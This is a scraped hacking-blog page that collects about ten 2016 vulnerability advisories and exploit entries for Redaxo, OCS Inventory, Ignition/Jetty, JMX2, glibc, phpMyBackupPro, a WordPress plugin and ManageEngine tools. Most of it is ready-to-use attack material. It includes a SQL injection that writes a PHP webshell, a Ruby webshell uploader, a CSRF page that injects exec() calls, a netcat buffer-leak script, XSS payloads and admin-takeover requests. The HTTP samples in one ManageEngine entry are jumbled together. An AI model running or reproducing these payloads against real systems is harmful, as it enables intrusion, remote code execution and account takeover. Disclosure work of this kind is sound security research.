=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===
Redaxo CMS contains multiple vulnerabilities
-------------------------------------------------------------
Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: https://www.redaxo.org/
Tested version: Redaxo CMS v5.0.0
Credits: LSE Leading Security Experts GmbH employee Tim Herres
Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
Advisory Status: Public
CVE-Number: na
Impact
======
Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
resulting in a Cross Site Scripting vulnerability.
Issue Description
=================
The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
1) SQL Injection in the "Mediapool" component:
Authentication required: yes
User needs access to the "Mediapool".
POC:
Exploitation using SQL Map
sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name
Parameter: media_name (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
2) Reflected XSS
Authentication required: yes
Used browser: FF42
Example:
https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.<script>alert("xss");</script>&opener_input_field=
3) Stored XSS (persistent XSS)
Authentication required: yes
Used browser: FF42
It is possible to store JavaScript Code in input fields.
Example:
Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
Payload:<script>alert("xss")</script>
Response:
[...]
[...]href="index.php?page=mediapool/structure&cat_id=801"><script>alert("xss");</script></a></li></ol></div><section class="rex-page-sectio
[...]
Temporary Workaround and Fix
============================
Update to Version 5.0.1
History
=======
2016-01-18 Issues discovered
2016-01-29 Vendor contacted
2016-02-05 Vendor confirmed
2016-02-09 Vendor released patch
2016-02-16 Advisory released
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863593582
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: OCS Inventory NG <= 2.2 - Search with various criteria SQL Injection and Code execution
# Date: 17-02-2016
# Exploit Author: Ephreet
# Software Link: http://www.ocsinventory-ng.org/en/download/
# Version: <=2.2
# Category: webapps
# Tested on: Debian 3.2.73-2+deb7u2 (MySQL 5.5.47-0+deb7u1, Apache/2.2.22), CentOS 6/7
1. Description
Custom search allows for SQL Injection, while default configuration allows for file write as MySQL user.
Search field fails to escape MySQL special characters, allowing file creation and code execution.
If permissions are not carefully set, one could write to web/crontab folders.
Infrustructure note: this was tested on a single machine, but still applies to multiple servers environments, affecting the DB host.
2. Proof of Concept
At least a low priv user must be logged and access the search function on http://<server>/ocsreports/index.php?function=visu_search
- Time-based SQL Injection
Choose a parameter, use EXACTLY operator:
')) union select sleep(5); #
- Code execution
Bypass input escape and write to filesystem (webshell PoC):
')) union select CONCAT(char(60),char(63),'php echo exec($_GET[',char(39),'cmd',char(39),']);',char(63),char(62)) into outfile '/usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/shell.php'; #
3. Solution
Run MySQL/Apache services as restricted user.
Restrict file write permissions to ocs DB user.
Watch out for weak permissions on /usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/ (it is often set to full write by inexperienced admins).
Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java
Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.
Desc: Remote unauthenticated atackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives a HTTP request, the below code is used
to parse through the HTTP headers and their associated values. The server
begins by looping through each character for a given header value and checks
the following:
- On Line 1164, the server checks if the character is printable ASCII or
not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (or less than 0x20), then all
of the checks above are skipped over and the code throws an ëIllegalCharacterí
exception on line 1186, passing in the illegal character and a shared buffer.
---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[..snip..]
1163: case HEADER_VALUE:
1164: if (ch>HttpTokens.SPACE || ch<0)
1165: {
1166: _string.append((char)(0xff&ch));
1167: _length=_string.length();
1168: setState(State.HEADER_IN_VALUE);
1169: break;
1170: }
1171:
1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173: break;
1174:
1175: if (ch==HttpTokens.LINE_FEED)
1176: {
1177: if (_length > 0)
1178: {
1179: _value=null;
1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181: }
1182: setState(State.HEADER);
1183: break;
1184: }
1185:
1186: throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Ubuntu Linux 14.04
Mac OS X
HP-UX Itanium
Jetty(9.2.z-SNAPSHOT)
Java/1.8.0_73
Java/1.8.0_66
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
14.01.2016
---
#######################
#!/bin/bash
#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'
function normalRequest {
echo "-- Normal Request --"
nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63
NORMREQ
}
function badCookie {
echo "-- Bad Cookie --"
nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}
BADCOOKIE
}
normalRequest
echo ""
echo ""
badCookie
#######################
Original raw analysis request via proxy using Referer:
------------------------------------------------------
GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00
Response leaking part of Cookie session:
----------------------------------------
HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)
# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none
require "net/http"
require "uri"
require 'uri-handler'
if ARGV.length != 2
puts "JMX2 Email Tester Web Shell Uploader"
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
puts " phpCode(ex): echo 'zzzzz'"
puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
puts " Install GEM: #> gem install uri-handler"
puts " exploit & code by hahwul[www.hahwul.com]"
else
target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1] # PHP Code
shell = shell.to_uri
exp_url = target_url + "/models/save_email.php"
puts shell
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
puts exp_url
request = Net::HTTP::Post.new(uri.request_uri)
request["Accept-Encoding"] = "gzip, deflate"
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
request["Accept"] = "application/json, text/javascript, */*; q=0.01"
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
request["Connection"] = "keep-alive"
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
response = http.request(request)
puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end
Sources:
https://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
https://github.com/fjserna/CVE-2015-7547
Technical information:
glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.
Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.
Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.
The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.
We are providing this code as-is. You are responsible for protecting yourself,
your property and data, and others from any risks caused by this code. This
code may cause unexpected and undesirable behavior to occur on your machine.
This code may not detect the vulnerability on your system.
Note that this POC consists of two components: server code and client code.
The server code triggers the vulnerability and therefore will crash the client
code. Note also that it is necessary to set the nameserver to point to the
server code, and doing so could cause other programs that call into the
getaddrinfo() function to crash while testing is underway. This POC code is
provided "as is" with no warranties, whether express or implied, including
without limitation any warranties or merchantability, fitness for a particular
use and noninfringement. Google assumes no responsibility for your proper
installation and use of the POC code.
Proof of Concept:
https://github.com/fjserna/CVE-2015-7547/archive/master.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39454-1.zip
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-RCE.txt
Vendor:
=============================
www.phpmybackuppro.net
project site:
sourceforge.net/projects/phpmybackup/
Product:
===========================
phpMyBackupPro v.2.5 (PMBP)
phpMyBackup Pro is a very easy to use, free, web-based MySQL backup
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or
email them and a lot more.
Vulnerability Type:
=========================
Remote Command Execution / CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
phpMyBackupPro uses PHP configuration files (global_conf.php) to manage
settings, allowing user to change things like sql host, language, email
etc..
However, a malicious local user can also inject persistent arbitrary PHP/OS
commands into the configuration to be executed on the host system.
The remote command execution can also be a result of a CSRF driveby by if
currently logged admin visits an attackers webpage.
Attackers can inject and write to disk arbitrary PHP code into the
global_conf.php configuration file if a victim visits a malicious webpage
or clicks an
infected link via a CSRF vector or additionally from a local malicious user
in shared host type environment.
first we escape the single quotes etc... so we can close the expected
entry, then we leverage the backtick "`" operator to have PHP execute OS
commands
on victims system as it works just as well without having to deal with all
the quote escaping.
e.g. payload that handles the single "'" quote an forward slashes "/"...
''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';
The above when injected will result in a write to $CONF variables in
global_conf.php as follows...
$CONF['lang']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`);
///\';');
OR...
$CONF['email']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`);
///\';');
Exploit code(s):
===============
Send admin infected link or convince them to visit our malicious webpage,
then if the user is logged in and...
a) clicks our link or visits our evil webpage or
b) submits the form locally (malicious user) then BOOOOOOOOOOOM!
Exploit to run calc.exe on Windows
<script>
var c=0;
(function RCE_MAYHEM(){
c++
var xhr=new XMLHttpRequest()
xhr.open('POST','
http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php',true)
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
xhr.send("sitename=localhost&lang=''///\\');exec(`c:/\Windows/\system32/\calc.exe`);
///\';&sql_host=localhost&sql_user=&sql_passwd=&sql_db=&ftp_server=
hyp3rlinx.altervista.org
&ftp_user=hyp3rlinx&ftp_passwd=&ftp_path=&ftp_pasv=1&ftp_port=666&ftp_del=1&email_use=1&email=&submit=Save+data")
if(c<2){
RCE_MAYHEM()
}
})()
</script>
Disclosure Timeline:
=====================================
Vendor Notification: NR
February 16, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=============================================================
Request Method(s): [+] POST
Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)
Vulnerable Parameter(s): [+] $CONF
============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SMBGRIND-BUFFER-OVERFLOW.txt
Vendor:
=======================
Network Associates Inc.
Product:
===========================================
smbgrind: NetBIOS parallel password grinder
circa 1996-1999
smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to
remotely crack SMB
usernames and passwords, used to establish a login session to the remote
NetBIOS file server.
Cybercop was discontinued back in 2002.
usage: smbgrind -i <address> [options]
-r Remote NetBIOS name of destination host
-i IP address of destination host
-u Name of userlist file (default NTuserlist.txt)
-p Name of password list file (default NTpasslist.txt)
-l Number of simultaneous connections (max: 50 default: 10)
-v Provide verbose output on progress
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
======================
Smbgrind.exe succumbs to buffer overflow when supplied a large number of
bytes (1206) for the -r switch for the remote
NetBios name of destination host. Resulting in memory corruption
overwriting several registers...
GDB dump...
Program received signal SIGSEGV, Segmentation fault.
0x0040c421 in ?? ()
(gdb) info r
eax 0x3 3
ecx 0x41414141 1094795585
edx 0x41414141 1094795585
ebx 0x41414141 1094795585
esp 0x241e89c 0x241e89c
ebp 0x241e8a8 0x241e8a8
esi 0x401408 4199432
edi 0x41414141 1094795585
eip 0x40c421 0x40c421
eflags 0x10283 [ CF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43
(gdb)
smbgrind core dump file...
(C:\smbgrind.exe 1000) exception C0000005 at 40C421
(C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141
(C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp
241F390
(C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx
# Exploit Title: Wordpress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability
# Software Link: https://wordpress.org/plugins/alo-easymail/
# Affected Version: 2.6.01
# Exploit Author: Mohsen Lotfi
# Contact: mohsen.lotfi.all@gmail.com
# Twitter: fox_one_fox_one
# Date: 01-16-2016
#####################
1. Description
#####################
The plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack.
script insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php :
case "save_list": // SAVE a mailing list (add or update)
if ( isset($_REQUEST['submit_list']) ) {
//$list_name = stripslashes( trim( $_POST['elp_list_name'] ) );
// List name
$list_name = array();
foreach ( $languages as $key => $lang ) {
if (isset($_POST['listname_'.$lang]) ) $list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang])); /* script insertion here */
}
$list_available = stripslashes( trim( $_POST['elp_list_available'] ) );
$list_order = stripslashes( trim( $_POST['elp_list_order'] ) );
if ( $list_name && $list_available && is_numeric($list_order) ) {
$mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' );
if ( $list_id ) { // update
$mailinglists [$list_id] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order );
} else { // or add a new
if ( empty($mailinglists) ) { // if 1st list, skip index 0
$mailinglists [] = array ( "name" => "not-used", "available" => "deleted", "order" => "");
}
$mailinglists [] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order);
}
if ( alo_em_save_mailinglists ( $mailinglists ) ) {
unset ( $list_id );
unset ( $list_name );
unset ( $list_available );
unset ( $list_order );
echo '<div id="message" class="updated fade"><p>'. __("Updated", "alo-easymail") .'</p></div>';
} else {
echo '<div id="message" class="error"><p>'. __("Error during operation.", "alo-easymail") .'</p></div>';
}
} else {
echo '<div id="message" class="error"><p>'. __("Inputs are incompled or wrong. Please check and try again.", "alo-easymail") .'</p></div>';
}
}
break;
#####################
2. Proof of Concept
#####################
Login as regular user then:
<form method="post" action="http://localhost/wordpress4.4/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php">
<input type="hidden" name="listname_en" value="<script>alert('xss')</script>">
<input type="hidden" name="elp_list_available" value="hidden">
<input type="hidden" name="elp_list_order" value="0">
<input type="hidden" name="user_ID" value="1">
<input type="hidden" name="task" value="save_list">
<input type="hidden" name="list_id" value="">
<input type="submit" name="submit_list" value="Trigger!">
</form>
#####################
3. Sulotion
#####################
Update to version 2.7.0
https://wordpress.org/plugins/alo-easymail/changelog/
#####################
4. Report Timeline
#####################
01-16-2016 : Vulnerability discovered.
01-25-2016 : Vendor notified of vulnerability.
02-07-2016 : Vendor replied and released fixed version.
===================================================================================
Privilege escalation Vulnerability in ManageEngine Network Configuration Management
===================================================================================
Overview
========
Title:- Privilege escalation Vulnerability in ManageEngine Network Configuration Management
Author: Kaustubh G. Padwad
Vendor: ZOHO Corp
Product: ManageEngine Network Configuration Manager
Tested Version: : Network Configuration Manager Build 11000
Severity: HIGH
Advisory ID
============
2016-03-Manage_Engine
About the Product:
==================
Network Configuration Manager is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, Network Configuration Manager helps automate and take total control of the entire life cycle of device configuration management.
Description:
============
This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application.
Vulnerability Class:
====================
Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization
How to Reproduce: (POC):
========================
* you should have Operator Account on Network Configuration Management
* login with that account to get api key something like user_1453993872278
* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :)
POC
====
Burp Requst
-----------
POST /nfaapi/json/admin/changePassword HTTP/1.1
Host: 192.168.1.10:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.10:8080/netflow/ncmapiclient/ember/index.jsp
Content-Length: 50
Cookie: OPUTILSJSESSIONID=E062B23129AA1269EF13794C7710DF8E; JSESSIONID=FBA6ADEE16123786896DF765CA4C9E87; NFA_Jsession=0BF63F9CE8F4DCF664857F92403D8B44; iamcsrfcookie=fbcc4bcb-34ea-4cc8-8cb3-e95dbfc0603d; NFA__SSO=0ED579E64493B973F5BCA1C94EAD6310
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
userName=admin&newPwd=11&apiKey=king_1453993872278
Response
--------
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Max-Age: 5000
Content-Type: application/json;charset=UTF-8
Date: Sat, 30 Jan 2016 20:22:15 GMT
Content-Length: 23
{"message":"success"}
Mitigation
==========
* Please Stop Network configuration manager service.
* Open Ncm\lib and cut AdvNCM.jar and paste it in to Desktop.
* Download the AdvNCM.jar file from below link and paste it under Ncm\lib
* https://uploads.zohocorp.com/Internal_Useruploads/dnd/DeviceExpert/o_1ab396o1i1a6v8j1cr86uet581/AdvNCM.jar
* Open Ncm\logs and delete all the files inside it,
* Start the Ncm service and check the issue.
Disclosure:
===========
* 31-JAN-2016 Repoerted to vendor
* 31-Feb-2016 Ack by Vendor
* 09-Feb-2016 Fixed By Vendor
credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
===================================================================================
Privilege escalation Vulnerability in ManageEngine oputils
===================================================================================
Overview
========
Title:- Privilege escalation Vulnerability in ManageEngine oputils
Author: Kaustubh G. Padwad
Vendor: ZOHO Corp
Product: ManageEngine oputils
Tested Version: : oputils 8.0
Severity: HIGH
Advisory ID
============
2016-05-Manage_Engine
About the Product:
==================
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.
Description:
============
This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application.
Vulnerability Class:
====================
Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization
How to Reproduce: (POC):
========================
* you should have Read only user on OpUtils
* login with that account to get api key something like 375e0fa0-0bb3-479c-a646-debb90a1f5f0
* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :)
POC
====
Burp Requst
-----------
POST /oputilsapi/admin?key=375e0fa0-0bb3-479c-a646-debb90a1f5f0 HTTP/1.1
Host: 192.168.1.10:7080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp
Content-Length: 151
Cookie: OPUTILSJSESSIONID=AC6E9B2C01FDDD5E27C245BC6F31C032; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
v=1&format=json&operation=DELETE_OR_MODIFY_USER&action1=MODIFY_USER&userInAction=kk&userRole=Administrator&userAuthType=Local&contactinfoID=2&loginID=2
Response
--------
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: OPUTILSJSESSIONID=184C572A3D2E17EEC3B78C027B925421; Path=/
Content-Type: application/json;charset=UTF-8
Content-Length: 90
Date: Thu, 04 Feb 2016 13:27:09 GMT
{"input":"{newUserName=MODIFY_USER, userInAction=kk, domainName=null}","status":"Success"}
Mitigation
==========
Upgrade to next Service pack
Disclosure:
===========
04-Feb-2016 Repoerted to vendor
11-Feb-2016 Fixed By vendor
################################################################################
====================================================================================================
Missing Function Level Access control Vulnerability in OPutils
====================================================================================================
Overview
========
Title:- Missing Function Level Access control Vulnerability in ManageEngine OpUtils
Author: Kaustubh G. Padwad
Vendor: ZOHO Corp
Product: OPUTILS
Tested Version: : OPUTILS 8.0
Severity: Medium
Advisory ID
============
2016-06-Manage_Engine
Description:
============
This Missing Function Level Access Control vulnerability enables an Normal user to execute the Adinisitative Task.
Vulnerability Class:
====================
2013-A7-Missing Function Level Access Control https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control
How to Reproduce: (POC):
========================
* Get The administrative Task URL from either demo site or download locally
* Now Login With Normal User
* Paste the below requst or any other for Ex. http://IP-OF-Server:7080/oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS
POC
====
Burp Requst
-----------
GET /oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS HTTP/1.1
Host: 192.168.1.10:7080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Response
--------
HTTP/1.1 200 OK
erver: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 589
Date: Thu, 04 Feb 2016 14:28:25 GMT
{"result":[{"ad-domain-name":"","user-name":"admin","account-created-time":"30 Jan 16, 12:20 AM","Action":"","user-contactinfo-id":"1","user-role":"Administrator","user-description":"--","user-phone-number":"","user-email":"","user-id":"1","ad-domain-id":"","user-login-id":"1"},{"ad-domain-name":"","user-name":"kk","account-created-time":"30 Jan 16, 12:23 AM","Action":"","user-contactinfo-id":"2","user-role":"Read Only User","user-description":"--","user-phone-number":"","user-email":"","user-id":"2","ad-domain-id":"","user-login-id":"2"}],"input":"{userId=null}","status":"Success"}
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Max-Age: 5000
Content-Type: application/json;charset=UTF-8
Date: Sat, 30 Jan 2016 21:39:03 GMT
Content-Length: 19
{"resolved":true}
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp
Cookie: OPUTILSJSESSIONID=C256E5B41CC23B33ACF94D206E243FB2; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=28A377BA0B7D0C6E21D1E2B3A3E4A371
Connection: keep-alive
Mitigation
==========
Upgrade to NextService Pack
Disclosure:
===========
04-Feb-2016 Repoerted to vendor
11-Feb-2016 Fixed By Vendor
################################################################################
===============================================================================
CSRF and XXS In Manage Engine oputils
===============================================================================
Overview
========
* Title : CSRF and XSS In Manage Engine OPutils
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://www.manageengine.com/products/oputils/
* Severity: HIGH
* Version Affected: Version 8.0
* Version Tested : Version 8.0
* version patched:
Advisory ID
============
2016-01-Manage_Engine
Description
===========
Vulnerable Parameter
--------------------
1. RouterName
2. action Form
3. selectedSwitchTab
4. ipOrHost
5. alertMsg
6. hostName
7. switchID
8. oidString
About Vulnerability
-------------------
This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc.
Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Steps to Reproduce: (POC)
=========================
* Add follwing code to webserver and send that malicious link to application Admin.
* The admin should be loggedin when he clicks on the link.
* Soical enginering might help here
For Example :- Device password has been changed click here to reset
####################CSRF COde#######################
<html>
<body>
<form action="http://192.168.1.10:7080/DeviceExplorer.cc">
<input type="hidden" name="RouterName" value="kaus"><img src=a onerror=confirm("Kaustubh")>tubh" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation
==========
Upgrade to next service pack
Change Log
==========
Disclosure
==========
28-January-2016 Reported to Developer
28-January-2016 Acknodlagement from developer
11-February-2016 Fixed by vendor ()
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
